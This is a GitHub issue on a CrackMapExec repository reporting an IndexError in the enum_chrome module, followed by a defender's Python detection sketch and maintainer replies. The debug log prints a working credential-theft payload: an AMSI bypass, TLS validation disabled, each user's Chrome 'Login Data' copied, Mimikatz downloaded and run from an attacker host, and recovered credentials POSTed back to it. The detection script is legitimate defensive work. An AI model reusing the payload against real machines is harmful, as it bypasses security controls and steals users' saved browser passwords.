This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

Enum_Chrome Module Error #126

Closed
redteamwynns-zz opened this issue Aug 12, 2016 · 4 comments
redteamwynns-zz commented Aug 12, 2016

Here's an error I got when trying to execute the new enum_chrome module on a Windows 10 build. Did not verify the remote host actually had Chrome; it very well may not. KTHXBYE!

(CME) root@Drone:~# cme 10.10.10.154 -id 1 -M enum_chrome --verbose
08-12-2016 11:11:03 CME          10.10.10.154:445 [*] Windows 10.0 Build 14393 (name:NAME) (domain:DOMAIN)
08-12-2016 11:11:03 CME          10.10.10.154:445 [+] DOMAIN\User (Pwn3d!)
08-12-2016 11:11:03 DEBUG                                          Payload: 
        $cmd = "privilege::debug sekurlsa::dpapi"
        $userdirs = get-childitem "$Env:SystemDrive\Users"
        foreach ($dir in $userdirs) {
            $LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"

            if ([System.IO.File]::Exists($LoginDataPath)) {
                $rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {[char]$_})
                $temp_path = "$Env:windir\Temp\$rand_name"
                Copy-Item $LoginDataPath $temp_path
                $cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
            }

        }
        $cmd = $cmd + " exit"

        IEX (New-Object Net.WebClient).DownloadString('https://10.10.10.96:443/Invoke-Mimikatz.ps1');
        $creds = Invoke-TJWNoSQnDv -Command $cmd;
        $request = [System.Net.WebRequest]::Create('https://10.10.10.96:443/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();
08-12-2016 11:11:03 DEBUG                                          Unincoded command:
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ 
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}

        $cmd = "privilege::debug sekurlsa::dpapi"
        $userdirs = get-childitem "$Env:SystemDrive\Users"
        foreach ($dir in $userdirs) {
            $LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"

            if ([System.IO.File]::Exists($LoginDataPath)) {
                $rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {[char]$_})
                $temp_path = "$Env:windir\Temp\$rand_name"
                Copy-Item $LoginDataPath $temp_path
                $cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
            }

        }
        $cmd = $cmd + " exit"

        IEX (New-Object Net.WebClient).DownloadString('https://10.10.10.96:443/Invoke-Mimikatz.ps1');
        $creds = Invoke-TJWNoSQnDv -Command $cmd;
        $request = [System.Net.WebRequest]::Create('https://10.10.10.96:443/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();

08-12-2016 11:11:03 DEBUG                                          Executed command via atexec
08-12-2016 11:11:03 ENUM_CHROME  10.10.10.154:445          [+] Executed payload
08-12-2016 11:11:03 ENUM_CHROME                                    [*] Waiting on 1 host(s)
08-12-2016 11:11:04 ENUM_CHROME  10.10.10.154                      [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
08-12-2016 11:11:08 ENUM_CHROME  10.10.10.154                      [*] - - "POST / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('10.10.10.154', 50127)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/.virtualenvs/CME/local/lib/python2.7/site-packages/cme/cmeserver.py", line 29, in do_POST
    self.server.module.on_response(self.server.context, self)
  File "/root/.virtualenvs/CME/local/lib/python2.7/site-packages/cme/modules/enum_chrome.py", line 108, in on_response
    passw = buf[i+3].split(':', 1)[1].strip()
IndexError: list index out of range
----------------------------------------
08-12-2016 11:11:19 [*] KTHXBYE!
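
For defenders, the payload printed in the debug output above contains several strings that PowerShell script block logging (event ID 4104) would record on the target. The Python sketch below is an added example, not part of the original issue or of CrackMapExec; the indicator names, the severity grading and the sample script blocks are constructed for illustration.

```python
import re

# Indicators lifted from the payload in the debug output above.
INDICATORS = {
    "amsi_tamper": re.compile(r"AmsiUtils.{0,80}amsiInitFailed", re.I | re.S),
    "tls_validation_off": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "download_exec": re.compile(r"\bIEX\b.{0,80}DownloadString", re.I | re.S),
    "chrome_login_data": re.compile(
        r"Google\\Chrome\\User Data\\[^\\\"']+\\Login Data", re.I),
    "windir_temp_staging": re.compile(r"\$Env:windir\\Temp\\", re.I),
    "dpapi_command": re.compile(r"dpapi::chrome|sekurlsa::dpapi", re.I),
}

def indicators_in(script_text):
    """Return sorted names of the indicators found in one script block."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))

def severity(hits):
    """Grade a hit list; one weak indicator alone is common in admin scripts."""
    hits = set(hits)
    strong = hits & {"amsi_tamper", "dpapi_command"}
    if strong or ("chrome_login_data" in hits and len(hits) >= 2):
        return "high"
    return "medium" if len(hits) >= 2 else ("low" if hits else "none")

def triage(events):
    """events: iterable of (record_id, script_text) -> graded findings."""
    findings = []
    for record_id, text in events:
        hits = indicators_in(text)
        if hits:
            findings.append((record_id, severity(hits), hits))
    return findings

# Constructed script-block samples (not real telemetry).
SAMPLES = [
    (101, r'''[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{}
$LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$temp_path = "$Env:windir\Temp\$rand_name"
IEX (New-Object Net.WebClient).DownloadString('https://192.0.2.10:443/x.ps1');'''),
    (102, r'''[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest https://intranet.example/health'''),
    (103, r'''Get-ChildItem "$Env:TEMP" | Remove-Item -Recurse'''),
]

if __name__ == "__main__":
    print(*triage(SAMPLES), sep="\n")
```

Grading on combinations keeps a lone certificate-validation override at low severity, while the AMSI field write or a Chrome `Login Data` path alongside any other indicator is graded high.
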
@byt3bl33d3r
Owner

Adding the dafuq label cause why not

@byt3bl33d3r
Owner

byt3bl33d3r commented Sep 21, 2016

Fixed in the newest version which will be released Friday

@byt3bl33d3r
Owner

Whoops, didn't mean to close.

@byt3bl33d3r
Owner

@redteamwynns should be fixed in latest version
